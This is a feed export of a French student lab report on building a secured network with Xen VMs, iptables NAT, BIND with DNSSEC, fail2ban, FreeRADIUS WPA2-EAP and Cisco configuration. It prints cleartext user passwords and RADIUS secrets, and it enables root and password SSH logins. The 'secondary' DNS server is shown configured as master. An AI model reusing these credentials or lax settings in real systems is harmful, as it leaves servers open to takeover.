&amp;lt;pre&amp;gt;&lt;br /&gt;
[DEFAULT]&lt;br /&gt;
bantime = 3600&lt;br /&gt;
findtime = 600&lt;br /&gt;
maxretry = 3&lt;br /&gt;
&lt;br /&gt;
[sshd]&lt;br /&gt;
enabled = true&lt;br /&gt;
port = ssh&lt;br /&gt;
filter = sshd&lt;br /&gt;
logpath = /var/log/auth.log&lt;br /&gt;
maxretry = 3&lt;br /&gt;
&lt;br /&gt;
[named-refused-tcp]&lt;br /&gt;
enabled = true&lt;br /&gt;
port = domain,953&lt;br /&gt;
protocol = tcp&lt;br /&gt;
filter = named-refused&lt;br /&gt;
logpath = /var/log/named/security.log&lt;br /&gt;
maxretry = 3&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Filtre &amp;lt;code&amp;gt;/etc/fail2ban/filter.d/named-refused.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
[Definition]&lt;br /&gt;
failregex = ^\S+ named\[\d+\]: client &amp;lt;HOST&amp;gt;#\S+ .* query .* denied&lt;br /&gt;
ignoreregex =&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Le service est démarré et activé :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
systemctl enable fail2ban&lt;br /&gt;
systemctl restart fail2ban&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Sécurisation WiFi par WPA2‑EAP ==&lt;br /&gt;
&lt;br /&gt;
=== Serveur FreeRADIUS sur Moon ===&lt;br /&gt;
Installation :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
apt install freeradius freeradius-utils -y&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ajout du client (point d’accès) dans &amp;lt;code&amp;gt;/etc/freeradius/3.0/clients.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
client vlan1_ap1 {&lt;br /&gt;
    ipaddr = 172.27.0.4    # VLAN 1 management&lt;br /&gt;
    secret = testing123&lt;br /&gt;
    shortname = cisco-ap1-vlan1&lt;br /&gt;
    nas_type = cisco&lt;br /&gt;
}&lt;br /&gt;
client vlan1_ap2 {&lt;br /&gt;
    ipaddr = 172.27.0.3    # VLAN 1 management&lt;br /&gt;
    secret = testing123&lt;br /&gt;
    shortname = cisco-ap2-vlan1&lt;br /&gt;
    nas_type = cisco&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Création d’un utilisateur dans &amp;lt;code&amp;gt;/etc/freeradius/3.0/users&amp;lt;/code&amp;gt; :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;quot;msalhi&amp;quot; Cleartext-Password := &amp;quot;WifiSecure2026!&amp;quot;&lt;br /&gt;
    &lt;br /&gt;
&amp;quot;etudiant1&amp;quot; Cleartext-Password := &amp;quot;Password123&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&amp;quot;prof&amp;quot; Cleartext-Password := &amp;quot;AdminSE4!&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration EAP pour PEAP‑MSCHAPv2 dans &amp;lt;code&amp;gt;/etc/freeradius/3.0/mods-enabled/eap&amp;lt;/code&amp;gt; (type par défaut &amp;lt;code&amp;gt;peap&amp;lt;/code&amp;gt;, tunnel intérieur &amp;lt;code&amp;gt;mschapv2&amp;lt;/code&amp;gt;).  &lt;br /&gt;
Un conflit de port (18120) a été résolu en commentant la section &amp;lt;code&amp;gt;listen&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;/etc/freeradius/3.0/sites-enabled/inner-tunnel&amp;lt;/code&amp;gt; (ou en mettant &amp;lt;code&amp;gt;port = 0&amp;lt;/code&amp;gt;).&lt;br /&gt;
&lt;br /&gt;
Test local :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
radtest msalhi WifiSecure2026! localhost 0 testing123&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Sent Access-Request Id 13 from 0.0.0.0:55851 to 127.0.0.1:1812 length 76&lt;br /&gt;
	User-Name = &amp;quot;msalhi&amp;quot;&lt;br /&gt;
	User-Password = &amp;quot;WifiSecure2026!&amp;quot;&lt;br /&gt;
	NAS-IP-Address = 127.0.0.1&lt;br /&gt;
	NAS-Port = 0&lt;br /&gt;
	Message-Authenticator = 0x00&lt;br /&gt;
	Cleartext-Password = &amp;quot;WifiSecure2026!&amp;quot;&lt;br /&gt;
Received Access-Accept Id 13 from 127.0.0.1:1812 to 127.0.0.1:55851 length 20&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
→ réponse &amp;lt;code&amp;gt;Access-Accept&amp;lt;/code&amp;gt; attendue.&lt;br /&gt;
&lt;br /&gt;
=== Configuration du point d’accès WiFi ===&lt;br /&gt;
Sur le point d’accès (wifi‑E304), les lignes suivantes ont été ajoutées (en conservant les configurations des autres étudiants) :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;cisco&amp;quot;&amp;gt;&lt;br /&gt;
aaa group server radius radius_student25&lt;br /&gt;
 server 192.168.20.2 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
aaa authentication login eap_student25 group radius_student25&lt;br /&gt;
&lt;br /&gt;
dot11 ssid VM_SERVICES_15&lt;br /&gt;
 vlan 25&lt;br /&gt;
 authentication open eap eap_student25&lt;br /&gt;
 authentication network-eap eap_student25&lt;br /&gt;
 authentication key-management wpa version 2&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
 encryption vlan 25 mode ciphers aes-ccm&lt;br /&gt;
 ssid VM_SERVICES_15&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0.25&lt;br /&gt;
 encapsulation dot1Q 25&lt;br /&gt;
 bridge-group 25&lt;br /&gt;
&lt;br /&gt;
interface GigabitEthernet0.25&lt;br /&gt;
 encapsulation dot1Q 25&lt;br /&gt;
 bridge-group 25&lt;br /&gt;
&lt;br /&gt;
radius-server host 192.168.20.2 auth-port 1812 acct-port 1813 key radius_secret_salhi_2026&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Configuration DHCP sur les routeurs ===&lt;br /&gt;
Sur '''E304''' (plage 100‑150) :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;cisco&amp;quot;&amp;gt;&lt;br /&gt;
ip dhcp excluded-address 10.60.15.1 10.60.15.99&lt;br /&gt;
ip dhcp excluded-address 10.60.15.151 10.60.15.254&lt;br /&gt;
&lt;br /&gt;
ip dhcp pool SALHI_VLAN25&lt;br /&gt;
 network 10.60.15.0 255.255.255.0&lt;br /&gt;
 default-router 10.60.15.1&lt;br /&gt;
 dns-server 192.168.20.2 8.8.8.8&lt;br /&gt;
 domain-name msalhi.online&lt;br /&gt;
 lease 0 12&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Policy‑Based Routing (PBR) ===&lt;br /&gt;
Pour que le trafic IPv4 du VLAN 25 passe par Solstice (où il sera NATé vers Internet), on a configuré sur E304 :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;cisco&amp;quot;&amp;gt;&lt;br /&gt;
ip access-list extended TRAFIC_VLAN25&lt;br /&gt;
 permit ip 10.60.15.0 0.0.0.255 any&lt;br /&gt;
!&lt;br /&gt;
route-map PBR_VLAN25 permit 10&lt;br /&gt;
 match ip address TRAFIC_VLAN25&lt;br /&gt;
 set ip next-hop 193.48.57.167&lt;br /&gt;
!&lt;br /&gt;
interface Vlan25&lt;br /&gt;
 ip policy route-map PBR_VLAN25&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette politique force tout le trafic IPv4 du VLAN 25 vers Solstice. La mascarade a ensuite été élargie sur Solstice pour inclure ce réseau :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
iptables -t nat -A POSTROUTING -s 10.60.15.0/24 -o eth1 -j MASQUERADE&lt;br /&gt;
iptables-save &amp;gt; /etc/iptables/rules.v4&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Tests ===&lt;br /&gt;
Un client connecté au SSID &amp;lt;code&amp;gt;VM_SERVICES_15&amp;lt;/code&amp;gt; obtient une adresse IP dans la plage DHCP (ex. &amp;lt;code&amp;gt;10.60.15.101&amp;lt;/code&amp;gt;), peut résoudre des noms DNS (via Moon) et accéder à Internet. Le traceroute montre le passage par Solstice (&amp;lt;code&amp;gt;193.48.57.167&amp;lt;/code&amp;gt;).&lt;/div&gt;</summary>
		<author><name>Msalhi</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E15&amp;diff=12474</id>
		<title>Atelier SysRes SE4 2025/2026 E15</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E15&amp;diff=12474"/>
		<updated>2026-02-27T12:08:47Z</updated>

		<summary type="html">&lt;p&gt;Msalhi : /* Serveur FreeRADIUS sur Moon */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&amp;lt;div class=&amp;quot;titlepage&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Rapport de Projet SE4 IdO&amp;lt;br /&amp;gt;&lt;br /&gt;
Sécurité Système/Réseau'''&lt;br /&gt;
&lt;br /&gt;
'''Année Universitaire 2025-2026'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div class=&amp;quot;figure&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[File:polytech_logo.png|image]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
'''Étudiant: Mohamed SALHI'''&lt;br /&gt;
&lt;br /&gt;
'''Binôme: SE4.Solstice (mandataire) - SE4.Moon (services)'''&lt;br /&gt;
&lt;br /&gt;
'''Domaine: &amp;lt;code&amp;gt;msalhi.online&amp;lt;/code&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
'''École Polytechnique Universitaire de Lille'''&lt;br /&gt;
&lt;br /&gt;
2026-02-02&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;introduction&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
= Introduction =&lt;br /&gt;
&lt;br /&gt;
Ce rapport documente la réalisation complète du projet de sécurité système et réseau dans le cadre du module SE4 IdO (Internet des Objets). L’objectif principal était de mettre en place une infrastructure réseau complète avec services virtualisés, en mettant l’accent sur la sécurité et la redondance.&lt;br /&gt;
&lt;br /&gt;
L’architecture repose sur une approche '''dual-stack IPv4/IPv6''' avec :&lt;br /&gt;
&lt;br /&gt;
* Une '''machine de services''' (SE4.Moon) hébergeant les services applicatifs&lt;br /&gt;
* Une '''machine mandataire''' (SE4.Solstice) gérant les accès IPv4 via NAT et proxy inverse&lt;br /&gt;
* Une infrastructure réseau redondante avec routeurs Cisco C9200&lt;br /&gt;
* Des services sécurisés (DNS avec DNSSEC, HTTPS avec certificats, SSH avec filtrage)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;atelier-système-et-réseau---machines-virtuelles&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
= Atelier système et réseau - Machines virtuelles =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;création-des-machines-virtuelles&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Création des machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
Les machines virtuelles ont été créées sur l’hyperviseur Xen du Dom0 &amp;lt;code&amp;gt;capbreton.plil.info&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;commandes-de-création&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Commandes de création ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Création de la machine de services SE4.Moon&lt;br /&gt;
root@capbreton:~# xen-create-image --hostname=SE4.Moon --dhcp \&lt;br /&gt;
  --bridge=pontKS --dir=/usr/local/xen --size=10GB \&lt;br /&gt;
  --dist=daedalus --memory=2048M --force&lt;br /&gt;
&lt;br /&gt;
# Création de la machine mandataire SE4.Solstice&lt;br /&gt;
root@capbreton:~# xen-create-image --hostname=SE4.Solstice --dhcp \&lt;br /&gt;
  --bridge=pontKS --dir=/usr/local/xen --size=10GB \&lt;br /&gt;
  --dist=daedalus --memory=2048M --force&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;démarrage-et-connexion&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Démarrage et connexion ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Démarrage des VMs&lt;br /&gt;
xen create /etc/xen/SE4.Moon.cfg&lt;br /&gt;
xen create /etc/xen/SE4.Solstice.cfg&lt;br /&gt;
&lt;br /&gt;
# Connexion aux consoles&lt;br /&gt;
xen console SE4.Moon&lt;br /&gt;
xen console SE4.Solstice&lt;br /&gt;
&lt;br /&gt;
# Liste des VMs actives&lt;br /&gt;
root@capbreton:~# xen list&lt;br /&gt;
Name                                        ID   Mem VCPUs    State   Time(s)&lt;br /&gt;
SE4.Solstice                                39  2048     1     -b----    2560.1&lt;br /&gt;
SE4.Moon                                   119  2048     1     -b----     452.3&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-de-la-machine-de-services-se4.moon&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Configuration de la machine de services (SE4.Moon) ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;montage-des-partitions-lvm-pour-var-et-home&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Montage des partitions LVM pour /var et /home ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Création des fichiers de partition sur le Dom0&lt;br /&gt;
root@capbreton:/dev/virtual# lvcreate -L 10G -n SE4.Moon.var virtual&lt;br /&gt;
root@capbreton:/dev/virtual# lvcreate -L 10G -n SE4.Moon.home virtual&lt;br /&gt;
&lt;br /&gt;
# Modification du fichier de configuration Xen&lt;br /&gt;
disk = [&lt;br /&gt;
    'file:/usr/local/xen/domains/SE4.Moon/disk.img,xvda2,w',&lt;br /&gt;
    'file:/usr/local/xen/domains/SE4.Moon/swap.img,xvda1,w',&lt;br /&gt;
    'phy:/dev/virtual/SE4.Moon.home,xvdb,w',&lt;br /&gt;
    'phy:/dev/virtual/SE4.Moon.var,xvdc,w',&lt;br /&gt;
]&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;formatage-et-montage-des-partitions&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Formatage et montage des partitions ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Formatage des partitions&lt;br /&gt;
mkfs -t ext4 /dev/xvdb&lt;br /&gt;
mkfs -t ext4 /dev/xvdc&lt;br /&gt;
&lt;br /&gt;
# Montage temporaire et copie des données&lt;br /&gt;
mount /dev/xvdc /mnt&lt;br /&gt;
mv /var/* /mnt/&lt;br /&gt;
umount /mnt&lt;br /&gt;
&lt;br /&gt;
mount /dev/xvdb /mnt&lt;br /&gt;
mv /home/* /mnt/&lt;br /&gt;
umount /mnt&lt;br /&gt;
&lt;br /&gt;
# Configuration du fstab&lt;br /&gt;
cat &amp;gt; /etc/fstab &amp;lt;&amp;lt; EOF&lt;br /&gt;
/dev/xvda1 none swap sw 0 0&lt;br /&gt;
/dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
/dev/xvdb /home ext4 defaults 0 2&lt;br /&gt;
/dev/xvdc /var ext4 defaults 0 2&lt;br /&gt;
EOF&lt;br /&gt;
&lt;br /&gt;
# Application des modifications&lt;br /&gt;
mount -a&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-réseau&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration réseau ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/network/interfaces&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Interface réseau privée (vers Solstice)&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
    address 192.168.20.2/24&lt;br /&gt;
    gateway 192.168.20.1&lt;br /&gt;
&lt;br /&gt;
# Configuration IPv6 automatique&lt;br /&gt;
iface eth0 inet6 auto&lt;br /&gt;
&lt;br /&gt;
# Vérification&lt;br /&gt;
root@Moon:~# ip a show eth0&lt;br /&gt;
2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP&lt;br /&gt;
    inet 192.168.20.2/24 brd 192.168.20.255 scope global eth0&lt;br /&gt;
    inet6 2001:660:4401:60a0:216:3eff:fe6f:f547/64 scope global dynamic&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;installation-des-paquets-de-base&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Installation des paquets de base ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;apt update &amp;amp;&amp;amp; apt upgrade -y&lt;br /&gt;
apt install -y ssh apache2 bind9 bind9utils \&lt;br /&gt;
  fail2ban openssl iptables-persistent \&lt;br /&gt;
  net-tools curl wget vim&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-de-la-machine-mandataire-se4.solstice&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Configuration de la machine mandataire (SE4.Solstice) ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-réseau-1&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration réseau ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/network/interfaces&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Interface publique (réseau routé)&lt;br /&gt;
auto eth1&lt;br /&gt;
iface eth1 inet static&lt;br /&gt;
    address 193.48.57.167/27&lt;br /&gt;
    gateway 193.48.57.162  # Adresse VRRP virtuelle&lt;br /&gt;
&lt;br /&gt;
iface eth1 inet6 auto&lt;br /&gt;
&lt;br /&gt;
# Interface privée (vers Moon)&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
    address 192.168.20.1/24&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet6 auto&lt;br /&gt;
&lt;br /&gt;
# Vérification&lt;br /&gt;
root@Solstice:~# ip a show eth1&lt;br /&gt;
3: eth1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP&lt;br /&gt;
    inet 193.48.57.167/27 brd 193.48.57.191 scope global eth1&lt;br /&gt;
    inet6 2001:660:4401:60a0:216:3eff:fe29:880f/64 scope global dynamic&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;mise-en-place-de-la-mascarade-nat&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Mise en place de la mascarade (NAT) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Activation du forwarding IP&lt;br /&gt;
echo &amp;quot;net.ipv4.ip_forward=1&amp;quot; &amp;gt;&amp;gt; /etc/sysctl.conf&lt;br /&gt;
sysctl -p&lt;br /&gt;
&lt;br /&gt;
# Règles iptables pour la mascarade&lt;br /&gt;
iptables -t nat -A POSTROUTING -s 192.168.20.0/24 -o eth1 -j MASQUERADE&lt;br /&gt;
iptables -A FORWARD -i eth0 -o eth1 -j ACCEPT&lt;br /&gt;
iptables -A FORWARD -i eth1 -o eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT&lt;br /&gt;
&lt;br /&gt;
# Sauvegarde pour persistance&lt;br /&gt;
iptables-save &amp;gt; /etc/iptables/rules.v4&lt;br /&gt;
&lt;br /&gt;
# Ajout dans interfaces pour chargement au démarrage&lt;br /&gt;
post-up iptables-restore &amp;lt; /etc/iptables/rules.v4&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;services-internet&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
= Services Internet =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;serveur-ssh&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Serveur SSH ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-ssh-sur-moon&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration SSH sur Moon ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Édition du fichier de configuration&lt;br /&gt;
vim /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
# Modifications apportées :&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
PasswordAuthentication yes&lt;br /&gt;
Port 22&lt;br /&gt;
# LogLevel VERBOSE&lt;br /&gt;
&lt;br /&gt;
# Redémarrage du service&lt;br /&gt;
systemctl restart ssh&lt;br /&gt;
systemctl enable ssh&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;redirection-de-ports-pour-laccès-ipv4&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Redirection de ports pour l’accès IPv4 ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Redirection du port 2201 vers Moon (SSH)&lt;br /&gt;
iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 2201 \&lt;br /&gt;
  -j DNAT --to-destination 192.168.20.2:22&lt;br /&gt;
&lt;br /&gt;
iptables -A FORWARD -p tcp -d 192.168.20.2 --dport 22 -j ACCEPT&lt;br /&gt;
&lt;br /&gt;
# Sauvegarde&lt;br /&gt;
iptables-save &amp;gt; /etc/iptables/rules.v4&lt;br /&gt;
&lt;br /&gt;
# Test de la redirection&lt;br /&gt;
ssh -p 2201 root@193.48.57.167  # Arrive sur Moon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;serveur-dns&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-du-serveur-maître-moon&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration du serveur maître (Moon) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/bind/named.conf.local&lt;br /&gt;
zone &amp;quot;msalhi.online&amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;quot;/etc/bind/zones/db.msalhi.online&amp;quot;;&lt;br /&gt;
    key-directory &amp;quot;/etc/bind/keys&amp;quot;;&lt;br /&gt;
    dnssec-policy &amp;quot;default&amp;quot;;&lt;br /&gt;
    inline-signing yes;&lt;br /&gt;
    allow-transfer { &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe29:880f;&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe47:bbe7;&lt;br /&gt;
	2001:660:4401:60a0:216:3eff:fed6:4bc3;&lt;br /&gt;
    };&lt;br /&gt;
    also-notify { &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe29:880f;&lt;br /&gt;
	2001:660:4401:60a0:216:3eff:fed6:4bc3;&lt;br /&gt;
    };&lt;br /&gt;
    notify yes;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Fichier de zone /etc/bind/zones/db.msalhi.online&lt;br /&gt;
$TTL 86400&lt;br /&gt;
@   IN  SOA ns1.msalhi.online. admin.msalhi.online. (&lt;br /&gt;
        2026020320  ; Serial INCRÉMENTÉ et corrigé&lt;br /&gt;
        3600        ; Refresh&lt;br /&gt;
        1800        ; Retry&lt;br /&gt;
        604800      ; Expire&lt;br /&gt;
        86400       ; Minimum TTL&lt;br /&gt;
    )&lt;br /&gt;
&lt;br /&gt;
; Serveurs de noms&lt;br /&gt;
@       IN  NS  ns1.msalhi.online.&lt;br /&gt;
@       IN  NS  ns1.merteuil.tech.&lt;br /&gt;
&lt;br /&gt;
; Enregistrements&lt;br /&gt;
@       IN  A       193.48.57.167&lt;br /&gt;
@       IN  AAAA    2001:660:4401:60a0:216:3eff:fe6f:f548&lt;br /&gt;
ns1     IN  A       193.48.57.167&lt;br /&gt;
ns1     IN  AAAA    2001:660:4401:60a0:216:3eff:fe6f:f548&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
www     IN  CNAME   msalhi.online.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
# Vérification&lt;br /&gt;
named-checkzone msalhi.online /etc/bind/zones/db.msalhi.online&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-du-serveur-secondaire-solstice&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration du serveur secondaire (Solstice) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/bind/named.conf.local&lt;br /&gt;
zone &amp;quot;msalhi.online&amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;quot;/etc/bind/zones/db.msalhi.online&amp;quot;;&lt;br /&gt;
    key-directory &amp;quot;/etc/bind/keys&amp;quot;;&lt;br /&gt;
    dnssec-policy &amp;quot;default&amp;quot;;&lt;br /&gt;
    inline-signing yes;&lt;br /&gt;
    allow-transfer { &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe29:880f;&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe47:bbe7;&lt;br /&gt;
	2001:660:4401:60a0:216:3eff:fed6:4bc3;&lt;br /&gt;
    };&lt;br /&gt;
    also-notify { &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe29:880f;&lt;br /&gt;
	2001:660:4401:60a0:216:3eff:fed6:4bc3;&lt;br /&gt;
    };&lt;br /&gt;
    notify yes;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Redémarrage et vérification&lt;br /&gt;
systemctl restart bind9&lt;br /&gt;
ls -la /var/lib/bind/db.msalhi.online&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-chez-le-registrar-gandi&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration chez le registrar Gandi ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+ Configuration DNS chez Gandi&lt;br /&gt;
|-&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Type'''&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Valeur'''&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Description'''&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Nameservers&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns1.msalhi.online&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Serveur DNS primaire&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;|&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns1.merteuil.tech&lt;br /&gt;
